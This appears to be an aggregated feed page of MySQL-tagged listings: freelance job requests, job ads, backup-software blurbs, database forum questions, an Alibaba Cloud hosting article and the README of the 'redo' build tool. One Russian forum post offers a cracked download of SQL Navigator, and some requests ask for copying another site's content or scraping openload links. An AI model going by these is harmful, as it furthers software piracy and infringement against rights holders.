Marketplace $24.99 - For sale: Php And Mysql by Larry Ullman Listed by you on September fifth
          Php developer      Cache   Translate Page      
PHP Developer - PHP, Laravel/Symfony, MySQL, Magento, Git Salary - £30,000 / £40,000 Location
          PHP/CodeIgniter programmer needed      Cache   Translate Page      
Toronto-based startup firm is looking for a PHP/LAMP developer with a guaranteed minimum workload of 20 hours per week. The candidate must have prior work experience with CodeIgniter framework. The candidate must be able to communicate in English Looking for a dedicated and motivated individual... (Budget: $15 - $25 CAD, Jobs: Bootstrap, Codeigniter, jQuery / Prototype, MySQL, PHP)
          Writers Editor Project -- 2      Cache   Translate Page      
Very very similar to https://www.zoho.com/writer/ Please look at specs in the file I have attached. (Budget: $250 - $750 USD, Jobs: Javascript, MySQL, node.js, PHP, Software Development)
          Build a new website in wordpress      Cache   Translate Page      
I need a developer who can create a new website same like http://kudzu.com and copy content and reviews from that website to new one. (Budget: $30 - $250 USD, Jobs: Full Stack Development, HTML, MySQL, PHP, Web Development, Website Design, WordPress)
          Drag and drop magazine layout organizer      Cache   Translate Page      
Hi, I need to create a drag and drop magazine layout organizer in php, jquery, ajax and mysql. Basically I need to have all the customers on the left side and 60 boxes on the right side (the boxes are the pages, and need to have them in 4 columns). And then be able to drag and drop each customer into a specific box or page, also need to be able to sort them inside the box (maximum 4 per box). And finally need to be able to add an extra page or box at any moment in the middle of the existing ones and the program need to re-sort everything automatically. Also need to be able to add new customers at any time and select if their add is full page, half page, quarter etc. (Prize: 100)
          sysutils/bacula9-docs - 9.2.2      Cache   Translate Page      
Upgrade to 9.2.2 https://blog.bacula.org/bacula-release-9-2-2/ Note: if you are running MySQL and have not recently executed src/cats/update_bacula_tables, please do so. It will not change your database version but it will fix some potential MySQL problems (for more detals see the release notes for version 9.2.1).
          sysutils/bacula9-server - 9.2.2      Cache   Translate Page      
Upgrade to 9.2.2 https://blog.bacula.org/bacula-release-9-2-2/ Note: if you are running MySQL and have not recently executed src/cats/update_bacula_tables, please do so. It will not change your database version but it will fix some potential MySQL problems (for more detals see the release notes for version 9.2.1).
          Drag and drop magazine layout organizer      Cache   Translate Page      
Hi, I need to create a drag and drop magazine layout organizer in php, jquery, ajax and mysql. Basically I need to have all the customers on the left side and 60 boxes on the right side (the boxes are the pages, and need to have them in 4 columns). And then be able to drag and drop each customer into a specific box or page, also need to be able to sort them inside the box (maximum 4 per box). And finally need to be able to add an extra page or box at any moment in the middle of the existing ones and the program need to re-sort everything automatically. Also need to be able to add new customers at any time and select if their add is full page, half page, quarter etc. (Prize: 100)
          دانلود Udemy Using MySQL Databases With Python آموزش پایگاه داده مای اس کیو ال همراه با پایتون      Cache   Translate Page      

  این پایگاه داده بصورت رایگان [Community] و هم بصورت تجاری [Enterprise] عرضه شده است . نسخه استفاده شده در سیستم های هاستینگ ورژن رایگان بوده و نسخه تجاری آن برای سازمان های بزرگ و دیتابیس های حجیم با درگیری بالا قابل استفاده می باشد. در دوره آموزشی Udemy Using MySQL Databases With Python به صورت مقدماتی با مای اس کیو ال و طراحی پایگاه داده با آن همراه با پایتون آشنا می شوید.  

نوشته دانلود Udemy Using MySQL Databases With Python آموزش پایگاه داده مای اس کیو ال همراه با پایتون اولین بار در فایل نیکو پدیدار شد.


          I need someone who knows how to scrap openload links      Cache   Translate Page      
Hello i need someone to show me how to scrap openload links because i need to scrap one site multiple times because theres always new content coming out (Budget: $8 - $15 USD, Jobs: MySQL, PHP, Python, Software Architecture, Web Scraping)
          I need someone who knows how to scrap openload links      Cache   Translate Page      
Hello i need someone to show me how to scrap openload links because i need to scrap one site multiple times because theres always new content coming out (Budget: $8 - $15 USD, Jobs: MySQL, PHP, Python, Software Architecture, Web Scraping)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          77:NoSQL之Memcached介绍及安装      Cache   Translate Page      
1、nosql:非关系型数据库;关系型的数据库代表是mysql; 关系型的数据库代表是mysql,可以使用sql语句(create insert update select)等,是需要把数据库存放到库-表-行-字段里,查询的是也一行一行去匹配,当查询量非常大的时候很耗费资源; nosql的存储原理非常简单(数据类型为k-v),一个键对应一个值,不存在繁琐的关系链,比...
          Mysql 8.x [Err] 1055 only_full_group_by 问题记录      Cache   Translate Page      
查询时报错 [Err] 1055 - Expression #1 of SELECT list is not in GROUP BY clause and contains nonaggregated column ' SELECT c.* ,COUNT(courseId) as cnum FROM center_coursetime c WHERE isDel=0 GROUP BY schoolId ORDER BY c.createTime DESC 解决方法: 登录mysql 后可以查看sql_mode show variables like ...
          Sviluppatore software      Cache   Translate Page      
Necessito di uno sviluppatore software per la realizzazione di modulo pagamenti tramite servizio di terze parti Stripe e relativa integrazione API (Budget: €250 - €750 EUR, Jobs: HTML, Javascript, MySQL, PHP, Software Architecture)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Staff PHP Programmer Direktorat Sistem Informasi Manajemen UBAYA      Cache   Translate Page      

Direktorat Sistem Informasi Manajemen UBAYA membutuhkan staff programmer Tanggung Jawab Pekerjaan : – Melakukan perawatan software aplikasi – Melakukan pengembangan software aplikasi Syarat Pengalaman : Pengalaman mengerjakan pembuatan aplikasi berbasis web Keahlian : Menguasai bahasa pemrograman PHP, Menguasai basisdata Mysql (mengasai database postgresql menjadi pertimbangan utama) Mampu bekerjasama dalam tim kerja Cepat dalam menyesuaikan diri […]

Info selengkapnya Staff PHP Programmer Direktorat Sistem Informasi Manajemen UBAYA cek di www.loker.id


          Best Practices of Web Application Hosting in Alibaba Cloud      Cache   Translate Page      

This article was originally published on Alibaba Cloud. Thank you for supporting the partners who make SitePoint possible.

Deploying a highly available and scalable web application on a traditional data center is a complex and expensive undertaking. One must invest a lot of effort and resources into capacity management. But more often than not, it ends up in over or under-provisioning of resources, further resulting in inefficient investment in underutilized hardware. To tackle this challenge, Alibaba Cloud offers a reliable, scalable, and high-performing cloud infrastructure for most demanding web application deployment scenarios. This document intends to provide practical solutions and best practices when it comes to scaling your web application on Alibaba Cloud.

Traditional Solution for Common Web Application Hosting

In a traditional web hosting space, designing a scalable architecture is always a challenge. The below diagram depicts a traditional web hosting model. The purpose of this diagram is to help you compare it with a similar architecture hosted on the cloud.

Traditional web hosting usually follows a three-tier design that divides the architecture into presentation, application, and persistence layers. The design achieves scalability through the inclusion of additional servers at each of these layers. The architecture also has built-in high availability features. The section below examines the means of deploying this traditional web hosting in Alibaba Cloud.

Simple Web Application Hosting Architecture on Alibaba Cloud

The diagram below shows how the traditional web hosting architecture looks like when deployed using various Alibaba Cloud products and services:

The key components of this architecture include:

  • Elastic Compute Service (ECS) — Built on Alibaba Cloud's own large-scale distributed computing system, Elastic Compute Service or ECS is a scalable and highly-efficient cloud computing service. Alibaba Cloud ECS helps you to quickly build more stable and secure web applications to adapt to your business' real-time needs.
  • Object Storage Service (OSS) — Alibaba Cloud offers various options to store, access, and backup your data on the cloud. For static storage, it provides Object Storage Service (OSS) to facilitate automatic data replication and failure recovery.
  • ApsaraDB for RDS — Relational Database Service or RDS is a stable, reliable, elastic and high-performance online database service based on Alibaba Cloud's own distributed system. It supports MySQL, SQL Server, PostgreSQL, and PPAS. Furthermore, it provides a comprehensive set of features including disaster recovery, data backup, monitoring, and migration.
  • DNS — Alibaba Cloud DNS service provides a highly available and scalable DNS service for your domain management needs. It automatically reroutes requests for your domain to the nearest DNS server.
  • Server Load Balancer (SLB) — Server Load Balancer is a web traffic distribution service that maximizes and extends the external service capabilities of your web applications. By seamlessly distributing traffic across multiple cloud servers and eliminating single points of failure, SLB enhances the reliability, usability, and availability of your applications.

Leveraging the Cloud for Web Application Hosting

When deploying a web application on Alibaba Cloud, you should consider making modifications in your deployment to fully utilize the advantages of the cloud. Below are some key considerations of when hosting an application on Alibaba Cloud.

Multiple Data Centers in a Region

Within a certain region, Alibaba Cloud usually operates at least two data centers called Availability Zones (AZs). Elastic Compute Service (ECS) in different AZs are both logically and physically separated. Alibaba Cloud provides an easy-to-use model for deploying your applications across AZs for higher availability and reliability.

High Security for Web Applications and Servers

Web application security is one of the primary concerns for organizations today, with more than 90% of the applications being vulnerable to security attacks. These attacks can exploit websites and inherent servers, which puts businesses at the risk of financial loss. To protect your web applications from such attacks, Alibaba Cloud provides a suite of network and application security services, such as Anti-DDoS (Basic and Pro), Web Application Firewall (WAF), and Server Guard.

In addition to these services, users can proactively limit external traffic by defining firewalls and permissions. The diagram below depicts the Alibaba Cloud web application hosting architecture that comes with a group firewall to secure the entire infrastructure.

The post Best Practices of Web Application Hosting in Alibaba Cloud appeared first on SitePoint.


          Handy Backup Small Server 7.18.0      Cache   Translate Page      
See more info

Author: Novosoft Handy Backup
File size: 164.30 Mb
Release date: 2018-11-07
Screenshot: Screenshot
Description: Handy Backup Small Server is a full-featured backup solution for Windows Server 2016/2012/2008. Provides backup of files, HDDs, MS SQL, MS Exchange, MySQL, PostgreSQL, Oracle to local and external drives, FTP/SFTP/FTPS, WebDAV, or cloud storages.
          Handy Backup Small Server 7.18.0      Cache   Translate Page      
See more info

Author: Novosoft Handy Backup
File size: 164.30 Mb
Release date: 2018-11-07
Screenshot: Screenshot
Description: Handy Backup Small Server is a full-featured backup solution for Windows Server 2016/2012/2008. Provides backup of files, HDDs, MS SQL, MS Exchange, MySQL, PostgreSQL, Oracle to local and external drives, FTP/SFTP/FTPS, WebDAV, or cloud storages.
          SoftoRooM -> SQL Navigator 7.5      Cache   Translate Page      
PRYANIK:
Твой софтовый форум: SoftoRooM
Quest SQL Navigator XPert Edition

Твой софтовый форум

описание (ru) SQL Navigator программное обеспечение, которое помогает разрабатывать высококачественные приложения, упрощает процесс написания, редактирования и обслуживания объектов базы данных.

Бесплатно скачав Quest SQL Navigator, вы сможете увеличить отдачу от своих СУБД Oracle, поддерживать определенные уровни производительности приложения/базы данных и обеспечивать доступ разработчикам или администраторам баз данных к платформам баз данных, отличающихся от Oracle, для выполнения запросов, просмотра и составления отчетов, выполнять правила ведения бизнеса для гарантирования правильности данных и соответствия бизнес-политикам.
SQL Navigator key обеспечивает настройку SQL для предотвращения влияния проблем производительности на работу пользователей приложений.

Основные возможности SQL Navigator:
▲ Точное написание, отладка и настройка программного кода.
▲ Гибкость выполнения многих разработок и задач администрирования при помощи одного инструмента.
▲ Возможность легко переходить от одной задачи к другой.
▲ Эффективность при выполнении ежедневных задач.
▲ Предоставление отчетности с обеспечением создания количественных данных и документации.
▲ Возможность работы в группах.
▲ Уменьшение общих расходов на разработку и администрирование путем автоматизации задач.
▲ Быстрое подключение к Oracle, SQL Server, MS Access, Sybase и MySQL для выполнения запросов и создания отчетов.
▲ Доступ к экспертизе Oracle через различные сообщества пользователей Toad.
▲ Уменьшение общих расходов на разработку и администрирование путем автоматизации задач.
▲ Последовательный, постоянный и измеримый процесс управления общими проектами разработки баз данных.
▲ Соответствие требованиям соглашения об уровне предоставляемых услуг (SLA).
▲ Включает продукт SQL Optimization для автоматического переписывания SQL кода, который мог бы потенциально сильно ухудшить производительность работы.
▲ Обнаруживает уязвимые участки в коде и обеспечивает возможность просматриваемость логическое покрытие PL/SQL кодом.


description (en) SQL Navigator SQL Navigator for Oracle helps you write better code faster

Deliver high-quality applications faster than ever by being able to write, edit and maintain database objects through automation and an intuitive graphical interface. Experience our powerful SQL software tool that optimizes performance issues before they impact production and end users.

Choose from four editions : SQL Navigator Base Edition, SQL Navigator Professional Edition, SQL Navigator Xpert Edition and SQL Navigator crack Developer Edition.
(supports Oracle 12c and Windows 8)

Features
Code Xpert
Determines software quality, abbreviates test cycles, reduces error rates, alleviates maintenance efforts, discovers software changes, and identifies high-risk code through industry-leading metrics and test coverage techniques
Team coding
Helps you maintain code integrity and integration with version control
ER diagram
Enables you to model a table, and view the dependencies and joins to other tables
Code road map
Highlights the complex interdependencies of your PL/SQL code within the database
SQL Optimizer for Oracle
This Oracle database development solution delivers integrated and enhanced SQL optimization functionality in the SQL Navigator Xpert Edition crack, and provides intelligent recommendations, SQL scanning and index optimization.


Interface languages: En
OS: Windows 10/8 (32bit-64bit)
Homepage: www.quest.com
скачать бесплатно / free download SQL Navigator XPert Edition 7.5 + crack (cracked.exe) ~ 90 Mb

SQL Navigator XPert Edition 7.5.0.82 x86
Скрытый текст!
Подробности на форуме...

SQL Navigator XPert Edition 7.5.0.82 x64
Скрытый текст!
Подробности на форуме...

SQL Navigator 7.5
источник: www.softoroom.net

          Mailwizz setup fix and optimize      Cache   Translate Page      
Hi there! I am looking for a freelancer with experience to check and correct a faulty MAILWIZZ setup, and also to optimize sending. The setup is pretty simple, Mailwizz installed on a VPS that connects to 5 MTAs on 5 different VPSs... (Budget: $30 - $250 USD, Jobs: Linux, Mailwizz, MySQL, PHP)
          Drupal Developer      Cache   Translate Page      
NC-Raleigh, job summary: An exciting digital marketing agency is looking for a driven (direct hire) developer with w orking knowledge of Drupal, PHP, JavaScript, and MySQL to join their team in Raleigh, NC. This role is great if you want to be a part of building products that deliver meaningful results and refreshing user experiences. location: Raleigh, North Carolina job type: Permanent work hours: 8 to 5 ed
          Mailwizz setup fix and optimize      Cache   Translate Page      
Hi there! I am looking for a freelancer with experience to check and correct a faulty MAILWIZZ setup, and also to optimize sending. The setup is pretty simple, Mailwizz installed on a VPS that connects to 5 MTAs on 5 different VPSs... (Budget: $30 - $250 USD, Jobs: Linux, Mailwizz, MySQL, PHP)
          Consultor Senior - Administrador de Plataformas Linux - IT Consultores S.A.S - Medellín, Antioquia, Colombia      Cache   Translate Page      
Empresa especializada en Consultoría en TI requiere Requisitos: Profesional en Ingeniería de Sistemas o carreras afines. Debe acreditar mínimo de 3 años de experiencia profesional desplegando infraestructura de servidores para el soporte de aplicaciones de misión crítica y/o como administrador de plataformas Linux. Debe contar con conocimientos intermedios en: Linux, redes, infraestructuras OnPremise y de Nube. Deseable conocimientos en administración de base de datos MySQL. ...
          Php Developer Urgent Hirings      Cache   Translate Page      
, RSS Feed, SVN Server, Flash Cpanel, MySQL, Dreamweaver, Analytic
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          geolocation script php      Cache   Translate Page      
We have a database with name, street and email. And we need a script to do 2 things: 1. send a message (email) to all users (from the database) near this street, lets say 5km radius 2. notify (like poke)... (Budget: $30 - $250 USD, Jobs: AJAX, Javascript, MySQL, PHP, Software Architecture)
          Programador PHP, CSS y Mysql para arreglos en aula virtual (ESPAÑA) -- 2      Cache   Translate Page      
Buscamos programador para pequeños arreglos que tenemos que ir realizando en nuestro aula virtual realizado en PHP importante que hable Español y horario de España es para continuar ya que tenemos trabajo de continuo... (Budget: €18 - €36 EUR, Jobs: CSS, HTML, MySQL, PHP, Website Design)
          Twilio SMS simple survey      Cache   Translate Page      
Hello Freelancers, I'm looking to create a Twilio SMS simple survey that will message a list of users at a set time. I'm thinking the host will be a AWS linux server running python. I set up a simple survey in Twilio studio, but need the data held in a server that I can review after... (Budget: $250 - $750 CAD, Jobs: Linux, MySQL, Python, Software Architecture, Web Hosting)
          Twilio SMS simple survey      Cache   Translate Page      
Hello Freelancers, I'm looking to create a Twilio SMS simple survey that will message a list of users at a set time. I'm thinking the host will be a AWS linux server running python. I set up a simple survey in Twilio studio, but need the data held in a server that I can review after... (Budget: $250 - $750 CAD, Jobs: Linux, MySQL, Python, Software Architecture, Web Hosting)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Web System Administrator      Cache   Translate Page      
VA-Richmond, job summary: The Web Systems Administrator position is responsible for administration of the companies web server environment. The current environment includes Windows, Apache, IIS, Tomcat, PHP, Java, Drupal, WordPress, and MySql. This position is a member of the Web Technologies team, which supports SharePoint, SQL Reporting Services, Project Server, the companies websites and web portals. This p
          build a php form with signature      Cache   Translate Page      
This will be used a waiver for a small local business, The form must have some text, fields and a signature panel. it must be mobile friendly. it must have add a minor field for up to several minors. all the submitted forms will have to be viewable later... (Budget: $10 - $30 USD, Jobs: MySQL, PHP, WordPress)
          Build a Website      Cache   Translate Page      
I am looking for a professional developer to build me a website from scratch. A part of the details is in the attached file. The website is needed to be in Arabic and support RTL. (Budget: $500 - $750 USD, Jobs: Graphic Design, MySQL, PHP, Python, Website Design)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Best Practices of Web Application Hosting in Alibaba Cloud      Cache   Translate Page      

This article was originally published on Alibaba Cloud. Thank you for supporting the partners who make SitePoint possible.

Deploying a highly available and scalable web application on a traditional data center is a complex and expensive undertaking. One must invest a lot of effort and resources into capacity management. But more often than not, it ends up in over or under-provisioning of resources, further resulting in inefficient investment in underutilized hardware. To tackle this challenge, Alibaba Cloud offers a reliable, scalable, and high-performing cloud infrastructure for most demanding web application deployment scenarios. This document intends to provide practical solutions and best practices when it comes to scaling your web application on Alibaba Cloud.

Traditional Solution for Common Web Application Hosting

In a traditional web hosting space, designing a scalable architecture is always a challenge. The below diagram depicts a traditional web hosting model. The purpose of this diagram is to help you compare it with a similar architecture hosted on the cloud.

Traditional web hosting usually follows a three-tier design that divides the architecture into presentation, application, and persistence layers. The design achieves scalability through the inclusion of additional servers at each of these layers. The architecture also has built-in high availability features. The section below examines the means of deploying this traditional web hosting in Alibaba Cloud.

Simple Web Application Hosting Architecture on Alibaba Cloud

The diagram below shows how the traditional web hosting architecture looks like when deployed using various Alibaba Cloud products and services:

The key components of this architecture include:

  • Elastic Compute Service (ECS) — Built on Alibaba Cloud's own large-scale distributed computing system, Elastic Compute Service or ECS is a scalable and highly-efficient cloud computing service. Alibaba Cloud ECS helps you to quickly build more stable and secure web applications to adapt to your business' real-time needs.
  • Object Storage Service (OSS) — Alibaba Cloud offers various options to store, access, and backup your data on the cloud. For static storage, it provides Object Storage Service (OSS) to facilitate automatic data replication and failure recovery.
  • ApsaraDB for RDS — Relational Database Service or RDS is a stable, reliable, elastic and high-performance online database service based on Alibaba Cloud's own distributed system. It supports MySQL, SQL Server, PostgreSQL, and PPAS. Furthermore, it provides a comprehensive set of features including disaster recovery, data backup, monitoring, and migration.
  • DNS — Alibaba Cloud DNS service provides a highly available and scalable DNS service for your domain management needs. It automatically reroutes requests for your domain to the nearest DNS server.
  • Server Load Balancer (SLB) — Server Load Balancer is a web traffic distribution service that maximizes and extends the external service capabilities of your web applications. By seamlessly distributing traffic across multiple cloud servers and eliminating single points of failure, SLB enhances the reliability, usability, and availability of your applications.

Leveraging the Cloud for Web Application Hosting

When deploying a web application on Alibaba Cloud, you should consider making modifications in your deployment to fully utilize the advantages of the cloud. Below are some key considerations of when hosting an application on Alibaba Cloud.

Multiple Data Centers in a Region

Within a certain region, Alibaba Cloud usually operates at least two data centers called Availability Zones (AZs). Elastic Compute Service (ECS) in different AZs are both logically and physically separated. Alibaba Cloud provides an easy-to-use model for deploying your applications across AZs for higher availability and reliability.

High Security for Web Applications and Servers

Web application security is one of the primary concerns for organizations today, with more than 90% of the applications being vulnerable to security attacks. These attacks can exploit websites and inherent servers, which puts businesses at the risk of financial loss. To protect your web applications from such attacks, Alibaba Cloud provides a suite of network and application security services, such as Anti-DDoS (Basic and Pro), Web Application Firewall (WAF), and Server Guard.

In addition to these services, users can proactively limit external traffic by defining firewalls and permissions. The diagram below depicts the Alibaba Cloud web application hosting architecture that comes with a group firewall to secure the entire infrastructure.

The post Best Practices of Web Application Hosting in Alibaba Cloud appeared first on SitePoint.


          Added Namespace and lost all the PHP OOPs Classes      Cache   Translate Page      

Both the Web Host and MySql Database are in UK and have the default TimeZone set to ‘Europe/London’.

This is the current script I am using now that British Summer Time is over.

// Original JSON FORMAT stored in tblValues -> time
   $row->time ==> string(30) "2018-11-02T13:15:37.346992742Z"

// Conversion from JSON format to TimeStamp
  $tstamp = substr($tstamp, 0, 16);         // 2018-11-02T13:15
  $tstamp = str_replace('T', ' ', $tstamp); // 2018-11-02 13:15

  $iUK  = strtotime($tstamp); // 1539642060

 /* 
   $britishSummerTime=FALSE // Change again 2019-03-31 
   if( $britishSummerTime ):
      $iUK += 60*60; 
   endif;  
 */

// Modified and saved to tblResults->tStamp as MySqli TIMESTAMP
   $row->tstamp ==> string(19) "2018-11-02 13:15:37" 

           Last access of a DB in Mysql      Cache   Translate Page      

I have “inherited” a collection of Mysql DBs (~900) and I would like to know which of them are actually being used. I looked around and I can find some commands like:

SELECT from_unixtime(UNIX_TIMESTAMP(MAX(UPDATE_TIME))) as last_update FROM information_schema.tables WHERE TABLE_SCHEMA='MY_DB' GROUP BY TABLE_SCHEMA;

but this does not really tell me if MY_DB is being accessed by some web service or users, right? It only informs about when it was last updated, unless I got it wrong. If so, is there a more accurate way to find out the last access of a DB?

Thank you!


          How can I add mysqli result set to another array      Cache   Translate Page      

Thanks. Not sure if it’s still a problem now, as the OP has edited the code to use the results retrieved from the query, but not added any detail on what is actually going wrong.


          How can I add mysqli result set to another array      Cache   Translate Page      

http://php.net/manual/en/mysqli-result.fetch-all.php


          Handy Backup Small Server 7.18.0      Cache   Translate Page      
Подробный обзор

Автор: Novosoft Handy Backup
Размер файла: 164.30 Mb
Дата релиза: 2018-11-07
Скриншот: Скриншот
Описание: Handy Backup Small Server is a full-featured backup solution for Windows Server 2016/2012/2008. Provides backup of files, HDDs, MS SQL, MS Exchange, MySQL, PostgreSQL, Oracle to local and external drives, FTP/SFTP/FTPS, WebDAV, or cloud storages.
          Handy Backup Small Server 7.18.0      Cache   Translate Page      
Подробный обзор

Автор: Novosoft Handy Backup
Размер файла: 164.30 Mb
Дата релиза: 2018-11-07
Скриншот: Скриншот
Описание: Handy Backup Small Server is a full-featured backup solution for Windows Server 2016/2012/2008. Provides backup of files, HDDs, MS SQL, MS Exchange, MySQL, PostgreSQL, Oracle to local and external drives, FTP/SFTP/FTPS, WebDAV, or cloud storages.
          Ubuntu 上更改 MySQL 数据库数据存储目录      Cache   Translate Page      

之前写过一篇博客“MySQL更改数据库数据存储目录”,当时的测试环境是RHEL和CentOS,谁想最近在Ubuntu下面更改MySQL数据库数据存储目录时遇到了之前未遇到的问题,之前的经验用不上了(或者说之前的总结不是太全面),修改完MySQL数据库数据存储目录后重启MySQL,发现MySQL服务无法启动。

Ubuntu 上更改 MySQL 数据库数据存储目录,首发于文章 - 伯乐在线


          M. Carlessi - La sicurezza dei database MySQL in ottica GDPR      Cache   Translate Page      
none
          M. Carlessi - MySQL 8: un database SQL/NoSQL semplice da usare      Cache   Translate Page      
none
          Problema con un insert de varios registros      Cache   Translate Page      

Problema con un insert de varios registros

Respuesta a Problema con un insert de varios registros

MUCHISIMAS GRACIASSSSS, tenia el mismo problema pense que la sintaxis era como en mysql.

Publicado el 04 de Noviembre del 2018 por Monica

          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          App IOS Android receber dados via PUSH      Cache   Translate Page      
Preciso criar um app que valide o login do usuário e se estiver dentro do "prazo de validade", solicite via push para uma URL dados a cada 30 segundos (ou algo assim). Tendo dados novos, add a informação... (Budget: $30 - $250 USD, Jobs: Android, iPhone, Mobile App Development, MySQL)
          Powers Recovery services fund raising      Cache   Translate Page      
www.powers-recovery.com We have put on the ground with our on finances a first class facility to aid in the recovery process of those less fortunate alcoholics and addicts that lack the resources to afford professional help... (Budget: $250 - $750 USD, Jobs: MySQL, Software Testing, Website Management, Website Testing)
          Iperius Backup Full 5.8.1      Cache   Translate Page      
Iperius Backup Full 5.8.1Информация о Софте
Название: Iperius Backup Full
Категория: Системные программы
Разработчик: www.iperiusbackup.com
Год выпуска: 2018
Размер файла: 47.00 MB
Залито на: TurboBit.net | HitFile.net | Nitroflare.com

О программе: Iperius Backup - программа резервного копирования, восстановления и синхронизации данных, совместимая со всеми платформами Windows. Позволяет проводить автоматическое резервное копирование на многие носители информации: внешние диски USB, носители RDX, NAS, ленточные накопители LTO/DAT, удаленные компьютеры и сайты по FTP, Облачное хранилище. Iperius Backup включает в себя создание образа диска, резервное копирование баз данных Microsoft SQL Server, MySQL, PostgreSQL, Oracle Database и Аварийное Восстановление.
          App IOS Android receber dados via PUSH      Cache   Translate Page      
Preciso criar um app que valide o login do usuário e se estiver dentro do "prazo de validade", solicite via push para uma URL dados a cada 30 segundos (ou algo assim). Tendo dados novos, add a informação... (Budget: $30 - $250 USD, Jobs: Android, iPhone, Mobile App Development, MySQL)
          Powers Recovery services fund raising      Cache   Translate Page      
www.powers-recovery.com We have put on the ground with our on finances a first class facility to aid in the recovery process of those less fortunate alcoholics and addicts that lack the resources to afford professional help... (Budget: $250 - $750 USD, Jobs: MySQL, Software Testing, Website Management, Website Testing)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          redo: a top-down software build system (designed by djb)      Cache   Translate Page      
redo: a top-down software build system

redo is a competitor to the long-lived, but sadly imperfect, make program. There are many such competitors, because many people over the years have been dissatisfied with make's limitations. However, of all the replacements I've seen, only redo captures the essential simplicity and flexibility of make, while avoiding its flaws. To my great surprise, it manages to do this while being simultaneously simpler than make, more flexible than make, and more powerful than make.

Although I wrote redo and I would love to take credit for it, the magical simplicity and flexibility comes because I copied verbatim a design by Daniel J. Bernstein (creator of qmail and djbdns, among many other useful things). He posted some very terse notes on his web site at one point (there is no date) with the unassuming title, " Rebuilding target files when source files have changed ." Those notes are enough information to understand how the system is supposed to work; unfortunately there's no code to go with it. I get the impression that the hypothetical "djb redo" is incomplete and Bernstein doesn't yet consider it ready for the real world.

I was led to that particular page by random chance from a link on The djb way , by Wayne Marshall.

After I found out about djb redo, I searched the Internet for any sign that other people had discovered what I had: a hidden, unimplemented gem of brilliant code design. I found only one interesting link: Alan Grosskurth, whose Master's thesis at the University of Waterloo was about top-down software rebuilding, that is, djb redo. He wrote his own (admittedly slow) implementation in about 250 lines of shell script.

If you've ever thought about rewriting GNU make from scratch, the idea of doing it in 250 lines of shell script probably didn't occur to you. redo is so simple that it's actually possible. For testing, I actually wrote an even more minimal version, which always rebuilds everything instead of checking dependencies, in 210 lines of shell (about 4 kbytes).

The design is simply that good.

My implementation of redo is called redo for the same reason that there are 75 different versions of make that are all called make . It's somehow easier that way. Hopefully it will turn out to be compatible with the other implementations, should there be any.

My extremely minimal implementation, called do , is in the minimal/ directory of this repository.

(Want to discuss redo? See the bottom of this file for information about our mailing list.)

Install

Install to /usr:

./redo test && sudo ./redo install

Install to $HOME:

./redo test && PREFIX=$HOME ./redo install License

